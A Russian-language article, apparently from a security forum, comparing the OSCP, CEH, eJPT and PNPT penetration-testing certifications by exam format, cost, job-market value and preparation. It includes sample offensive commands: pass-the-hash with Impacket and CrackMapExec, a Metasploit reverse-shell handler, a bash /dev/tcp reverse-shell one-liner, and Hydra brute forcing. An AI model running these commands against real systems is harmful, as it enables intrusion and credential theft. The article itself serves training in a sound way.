Каждый год в русскоязычном сегменте появляются десятки статей в духе «топ-5 сертификатов по кибербезопасности», где все четыре аббревиатуры стоят в одном списке с одинаковыми оценками «отлично подходит для начинающих». Проблема в том, что эти статьи пишут люди, которые ни одного из этих экзаменов не сдавали.
Мой коллега прошёл OSCP и eJPT лично, готовился к PNPT и видел формат CEH у коллег. Каждый день работаю с Burp Suite, Nmap, BloodHound и Impacket - и точно знаю, какая из сертификаций реально готовит к работе с этим стеком, а какая проверяет умение ткнуть в правильный вариант из четырёх. Ниже - его сравнение без маркетинга, с цифрами, форматами экзаменов и конкретными рекомендациями на 2025 год.
Зачем пентестеру сертификация в 2025 году
Рынок ИБ разросся настолько, что HR физически не может оценить технический уровень кандидата при первичном скрининге. Сертификация по пентесту стала фильтром - причём разные сертификаты работают как фильтры для разных типов контор.В 2025 году расклад такой:
- Государственные и compliance-ориентированные организации требуют CEH, потому что он вписан в рамки вроде DoD 8570 (по данным EC-Council и подтверждённым требованиям в вакансиях на defence-площадках).
- Консалтинговые компании и красные команды смотрят на OSCP как на минимальный порог входа. Нет OSCP - резюме часто даже не открывают.
- Стартапы и bug bounty площадки оценивают портфолио и практический опыт, но eJPT или PNPT показывают, что человек хотя бы способен самостоятельно пробить машину.
OSCP - золотой стандарт OffSec сертификации
OSCP (Offensive Security Certified Professional) - то, что рекрутеры называют «gold standard» для наступательной безопасности. И не случайно: экзамен проверяет не знание терминов, а способность взломать реальные машины за ограниченное время и написать по этому поводу профессиональный отчёт.OffSec сертификация строится вокруг философии «Try Harder» - тебе не дают подсказок, готовых решений или вариантов ответов. Либо ты эксплуатируешь уязвимость и получаешь флаг, либо нет. Жёстко, но честно.
Что изменилось в OSCP+ в 2024-2025
OffSec запустила обновлённый формат - OSCP+. По данным OffSec, кандидаты получают два статуса: классический пожизненный OSCP и трёхлетний возобновляемый OSCP+.Что изменилось для тех, кто сдаёт в 2025 году:
- Убрали 10 бонусных баллов, которые раньше начислялись за выполнение упражнений курса и документирование решений лабораторных машин. Теперь весь результат определяется исключительно экзаменом - никаких «подушек безопасности». Лично я считаю это правильным - бонусы размывали ценность сертификата.
- Усилен фокус на Active Directory. Экзамен по-прежнему включает сценарий «assumed compromise» в AD-части. Кандидат начинает с низкопривилегированным доступом внутри домена и должен добраться до Domain Admin. Это прямое отражение реальных пентестов, где начальная точка - фишинг или скомпрометированный аккаунт.
- Интеграция облачных модулей и AI-фидбэка в лабораторных средах (пока в бета-режиме).
Как готовиться к OSCP - конкретный план
Подготовка занимает от 3 до 6 месяцев при полной занятости. Вот что я делал и что рекомендую:Первый шаг - убедиться, что база на месте. Ты должен свободно работать в терминале Linux, понимать TCP/IP на уровне чтения pcap-дампов и писать скрипты на Python/Bash. Если не можешь - начни с eJPT, серьёзно.
Bash:
# Базовое сканирование - это первое, что ты делаешь на экзамене
nmap -sC -sV -oA initial_scan 10.10.10.0/24
# Полное сканирование портов (не пропускай высокие порты)
nmap -p- -T4 -oA full_scan 10.10.10.5
# Скрипт для автоматизации начального перебора
# Сначала генерируем список живых хостов из результатов ping-сканирования
nmap -sn 10.10.10.0/24 -oG - | grep 'Up' | awk '{print $2}' > targets.txt
# Внимание: ограничиваем параллелизм, чтобы не перегрузить систему
mkdir -p scans && cat targets.txt | xargs -P 5 -I {} sh -c 'nmap -sC -sV -oN "scans/$(echo {} | tr "." "_").txt" {}'
Третий шаг - дополнительная практика. Hack The Box и TryHackMe - платформы, где можно отточить навыки на OSCP-подобных машинах. Особый акцент: Active Directory. На экзамене AD-цепочка может дать больше половины баллов.
Стоимость: курс PEN-200 + 90 дней лабораторного доступа + один ваучер на экзамен - от 1599 долларов (по данным OffSec). Пересдача - за отдельные деньги. Да, недёшево. Но дешевле, чем провалить собеседование в компанию мечты.
CEH - сертификат этичного хакера от EC-Council
CEH (Certified Ethical Hacker) - самая «медийная» сертификация в области этичного хакинга. Её знают HR-специалисты, которые никогда не слышали ни про OSCP, ни про eJPT. Именно поэтому CEH до сих пор всплывает в требованиях к вакансиям - особенно в госсекторе и крупных корпорациях.Формат экзамена CEH
Экзамен - 125 вопросов с вариантами ответов, 4 часа. Практическая часть (CEH Practical) продаётся отдельно и не обязательна для получения базового сертификата. То есть можно получить «Certified Ethical Hacker» ни разу ничего не взломав. Занятный момент.Темы охватывают широкий спектр: от разведки (Reconnaissance) и сканирования до малвари, социальной инженерии и криптографии. По данным EC-Council, курс покрывает использование Nmap, Metasploit, Wireshark, Burp Suite - но на уровне «что это такое и зачем», а не «как написать кастомный эксплойт».
Требования: либо пройти официальное обучение EC-Council, либо подтвердить двухлетний опыт работы в ИБ.
Стоимость: официальное обучение плюс экзамен обходится ощутимо дороже, чем eJPT или PNPT. Точные цены зависят от региона и формата (онлайн/очно), но по деньгам сопоставимо с OSCP.
Сертификат действует 3 года. Продление - через CPE-кредиты или пересдачу.
CEH vs OSCP - в чём принципиальная разница
Вот объяснение, которое я даю на каждом собеседовании, когда спрашивают:CEH проверяет, знаешь ли ты, что такое
Ссылка скрыта от гостей
(T1550.002, Lateral Movement). OSCP проверяет, можешь ли ты выполнить Pass the Hash в реальном AD-окружении, перемещаясь между машинами через Impacket:
Bash:
# Pass the Hash через Impacket - то, что ты делаешь на OSCP
# Стандартная команда из документации Impacket
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b administrator@10.10.10.5
# Или через CrackMapExec для проверки хеша по подсети
crackmapexec smb 10.10.10.0/24 -u administrator -H e02bc503339d51f71d913c245d35b50b
Ссылка скрыта от гостей
, T1003), а потом использовать их для латерального движения - без подсказок и вариантов ответов.CEH не бесполезен. Он полезен как входной билет в compliance-ориентированные организации и как структурированное введение в терминологию. Но если хочешь работать руками - CEH этому не научит. Точка.
eJPT - точка входа в мир сертификаций пентестера
eJPT (eLearnSecurity Junior Penetration Tester) - сертификат от INE (бывшая eLearnSecurity), который позиционируется как первый практический экзамен для начинающих. И это действительно так - я сдавал eJPT до OSCP и могу подтвердить: он отлично калибрует базовые навыки.Формат экзамена eJPT
По данным INE, экзамен полностью практический: 48 часов на выполнение заданий в виртуальной среде. Проходной балл - 70%. Стоимость начинается от 249 долларов, включая ваучер на экзамен и три месяца доступа к обучающим материалам. Сертификат действует три года.Экзамен проверяет четыре направления:
- Методологии оценки безопасности
- Аудит устройств и сетей
- Тестирование на проникновение сетей
- Тестирование на проникновение веб-приложений
Что даёт eJPT на рынке труда
Честно - eJPT сертификат сам по себе не откроет двери в крупную компанию. Но он решает две конкретные задачи.Во-первых, показывает рекрутеру, что ты не просто «прошёл курс на Coursera», а реально ломал машины в контролируемой среде. Для junior-позиций в 2025 году это имеет значение.
Во-вторых, eJPT - отличный индикатор готовности к OSCP. Сдал eJPT за 12 часов из 48 - можно смело идти на OSCP. Еле уложился в 48 - нужно ещё практиковаться. Такой вот лакмусовый тест.
PNPT - практическая сертификация от TCM Security
PNPT (Practical Network Penetration Tester) от TCM Security - относительно новая сертификация, которая быстро набрала популярность в англоязычном сообществе. Создатель - Heath Adams (TheCyberMentor) - хорошо известен по YouTube-каналу и курсам, которые многие считают одними из лучших для самоподготовки.Что проверяет PNPT
PNPT сертификация охватывает полный цикл пентеста: от OSINT и внешней разведки до эксплуатации внутренней Active Directory инфраструктуры. Экзамен практический - нужно провести полноценный пентест в выделенной среде и написать профессиональный отчёт.Фишка PNPT: после сдачи практической части нужно пройти устное собеседование с экзаменатором, где ты защищаешь свой отчёт и объясняешь найденные уязвимости. Это максимально приближено к реальной работе - когда презентуешь результаты пентеста заказчику и тебя засыпают вопросами.
Курсы TCM Security, входящие в подготовку, высоко оцениваются сообществом. Они покрывают практическую работу с Active Directory, включая Kerberoasting, AS-REP Roasting и техники латерального перемещения.
Проблемы с целостностью экзамена PNPT
Тут надо быть честным. Согласно публикации исследователя Quintius Walker (GreyHatDev), в сети были обнаружены материалы, компрометирующие целостность экзамена PNPT - фактически готовые ответы к экзаменационным заданиям. Подобная проблема ранее затрагивала и другие сертификации, но для PNPT это особенно болезненно: именно практичность и подлинность экзамена были главными аргументами в её пользу.Означает ли это, что PNPT не стоит сдавать? Нет. Обучающие материалы TCM Security по-прежнему качественные. Но ценность PNPT на рынке пока ниже, чем у OSCP, и подобные инциденты не помогают ей расти.
Лучшая сертификация по кибербезопасности 2025 - сравнительная таблица
| Параметр | OSCP | CEH | eJPT | PNPT |
|---|---|---|---|---|
| Провайдер | OffSec | EC-Council | INE (eLearnSecurity) | TCM Security |
| Уровень | Intermediate-Advanced | Beginner-Intermediate | Beginner | Beginner-Intermediate |
| Формат экзамена | 23ч 45мин практика + 24ч отчёт | 125 вопросов MCQ, 4 часа | 48 часов, практика | Практика + отчёт + устная защита |
| Стоимость (от) | ~1599 USD (курс + экзамен) | Сопоставима с OSCP (зависит от формата) | от 249 USD | Зависит от пакета курсов |
| Срок действия | OSCP - пожизненно, OSCP+ - 3 года | 3 года (CPE для продления) | 3 года | Пожизненно (без ресертификации) |
| Фокус на AD | Да, усиленный в OSCP+ | Теоретический | Базовый | Да, практический |
| Признание HR | Высокое в техкомпаниях | Высокое в госсекторе | Низкое-среднее | Растущее |
| Проходной балл | 70 баллов из 100 | Зависит от версии | 70% | Оценка практики + защита |
| Навыки для сдачи | Linux, сети, скрипты, AD | Базовые IT-знания | Базовые сети и Linux | Сети, Linux, базовый AD |
Какую сертификацию по пентесту выбрать - дерево решений
Забудьте универсальные рекомендации. Выбор зависит от трёх вещей: текущий уровень, целевая позиция и бюджет.Путь для новичков без опыта в ИТ
Если ты не можешь объяснить, чем TCP отличается от UDP, или не работал в терминале Linux - начинать с OSCP бессмысленно. Потратишь деньги и провалишь экзамен. Я видел такое не раз.Маршрут: сначала бесплатные ресурсы (TryHackMe, OverTheWire) для фундамента. Затем eJPT как первый сертификат - от 249 долларов и 48 часов на экзамен, что достаточно комфортно для начинающего. После eJPT оценивай свои силы и двигайся к OSCP или PNPT.
Путь для ИТ-специалистов, переходящих в ИБ
Если у тебя есть опыт сисадминства, разработки или сетевой инженерии - ты уже знаешь половину того, что нужно. Вопрос - куда хочешь попасть.В госсектор или compliance - CEH. Он откроет двери, а практические навыки будешь добирать на работе.
В консалтинг или красную команду - сразу OSCP. Да, будет тяжело. Но каждый час подготовки к OSCP - это реальный навык, который пригодится на проекте. Никто не нанимает пентестера за красивый сертификат, если он не может поднять reverse shell:
Bash:
# Типичная задача на OSCP - получить reverse shell через найденную уязвимость
# Стандартная команда msfconsole из документации Metasploit
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.14.5; set LPORT 4444; run"
# Или без Metasploit - через netcat (One-liner для Linux)
nc -lvnp 4444
# На целевой машине (пример для демонстрации концепции):
# bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
Путь для практикующих пентестеров
Если ты уже работаешь пентестером и хочешь подтвердить квалификацию - только OSCP. Ни CEH, ни eJPT, ни PNPT не дадут такого веса в резюме. OSCP - единственная сертификация, которую технические интервьюеры в 2025 году уважают без оговорок.После OSCP - смотри на OSWE (веб-эксплуатация), OSEP (продвинутый пентест) или CRTO (Cobalt Strike, Red Team Operations).
Практический блок - от выбора до сдачи экзамена
Базовые навыки, которые проверяют все сертификации
Независимо от выбранного сертификата, ты должен свободно владеть следующими техниками (привожу с маппингом на MITRE ATT&CK - именно этот фреймворк используется в реальных отчётах):Разведка и сканирование - при внешнем сканировании до получения доступа: Active Scanning (T1595, Reconnaissance); при внутреннем сканировании после получения доступа к сети: Network Service Discovery (T1046, Discovery):
Bash:
# Пример рабочего процесса разведки (стандартные команды)
# 1. Обнаружение живых хостов
nmap -sn 192.168.1.0/24 -oG alive_hosts.txt
# 2. Сканирование портов и сервисов на обнаруженных хостах
nmap -sC -sV -p- -oA full_scan 192.168.1.100
# 3. Перебор директорий веб-приложения
gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt -o dirs.txt
Bash:
# Онлайн-брутфорс SSH (стандартная команда Hydra)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
# Офлайн-подбор хешей (стандартная команда John the Ripper)
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Дампинг учётных данных - OS Credential Dumping (T1003, Credential Access). На OSCP в AD-сценарии ты будешь извлекать хеши из LSASS, SAM и NTDS.dit. На CEH тебя спросят, что такое LSASS. Разница - как между чтением рецепта и готовкой ужина.
Выполнение команд - Command and Scripting Interpreter (T1059, Execution). Умение быстро накидать скрипт на Python или Bash, который автоматизирует рутину - без этого OSCP не пройти.
Что спрашивают на собеседованиях в 2025 году
Я проводил технические интервью и проходил их сам. Вот что реально спрашивают у кандидатов с разными сертификатами:У кандидата с CEH спросят: «Расскажите, как бы вы проводили пентест корпоративной сети». Ожидают методологию - разведка, сканирование, эксплуатация, пост-эксплуатация, отчёт. Базовый уровень.
У кандидата с OSCP спросят: «Вы получили низкопривилегированный шелл на Windows-машине в домене. Ваши следующие шаги?» И тут ожидают конкретику: проверить привилегии (
whoami /priv), посмотреть членство в группах, запустить WinPEAS или PowerUp, проверить SeImpersonatePrivilege для Potato-атак, попробовать извлечь хеши. Если ты на этом вопросе плывёшь - OSCP в резюме не спасёт.У кандидата с eJPT будут более мягкие вопросы, но всё равно практические: «Какие порты и сервисы вы проверяете первыми при внешнем пентесте?» Ожидают: 21 (FTP), 22 (SSH), 80/443 (HTTP/HTTPS), 445 (SMB), 3389 (RDP) - и объяснение, почему.
Отдельная тема - знание реальных уязвимостей. Если ты не можешь объяснить, как работает
Ссылка скрыта от гостей
(CVE-2017-0144, CVSS 8.8 HIGH - уязвимость SMBv1 в Windows, позволяющая удалённое выполнение кода через специально сформированные пакеты; CVSS-вектор NVD указывает PR:L (требуется аутентифицированная SMB-сессия). В некоторых конфигурациях Windows с включённым гостевым доступом или null-сессиями порог может быть ниже, но это зависит от настроек целевой системы) или
Ссылка скрыта от гостей
(CVE-2021-44228, CVSS 10.0 CRITICAL - RCE через JNDI lookup injection в Apache Log4j2 версий 2.0-beta9 до 2.15.0, исключая 2.12.2, 2.12.3 и 2.3.1, позволяющая выполнение произвольного кода через контролируемые атакующим LDAP-серверы; NVD классифицирует как CWE-917, CWE-502, CWE-20 и CWE-400), это красный флаг для интервьюера. Эти CVE - «классика», которую проходят в любом серьёзном курсе. OSCP и eJPT дают практику эксплуатации подобных уязвимостей в лабораторных средах. CEH - нет.Итог - матрица решений
Чтобы не ходить кругами:- Нет опыта, хочешь попробовать себя в пентесте - eJPT. Минимальный порог входа, практический экзамен, адекватная цена от 249 долларов.
- Есть ИТ-опыт, целишься в госсектор или compliance - CEH. Признан во всём мире как baseline-сертификат для регулируемых отраслей.
- Есть ИТ-опыт, хочешь стать пентестером или попасть в красную команду - OSCP. Без вариантов. Сложно, дорого, долго - но это единственный сертификат, который технический менеджер уважает безоговорочно.
- Хочешь структурированное обучение с акцентом на AD и soft skills (написание отчётов, защита перед заказчиком) - PNPT. Хорошие обучающие материалы, но рыночный вес пока ниже OSCP. Пожизненный срок действия без механизма ресертификации - это и плюс (нет дополнительных расходов), и минус (сертификат не подтверждает актуальность навыков со временем).
И последнее. Не путай сертификат с компетенцией. Бумага открывает двери на собеседование, но за столом напротив сидит человек, который попросит объяснить, как ты проводил Kerberoasting или почему выбрал Chisel вместо SSH-туннеля. И тут уже не важно, какие буквы стоят после твоего имени - важно, что ты реально умеешь делать руками. Попробуй развернуть лабу на один вечер, подними AD на двух виртуалках и пройди цепочку от Kerberoasting до DCSync. Если получится - ты готов. Если нет - теперь знаешь, что учить.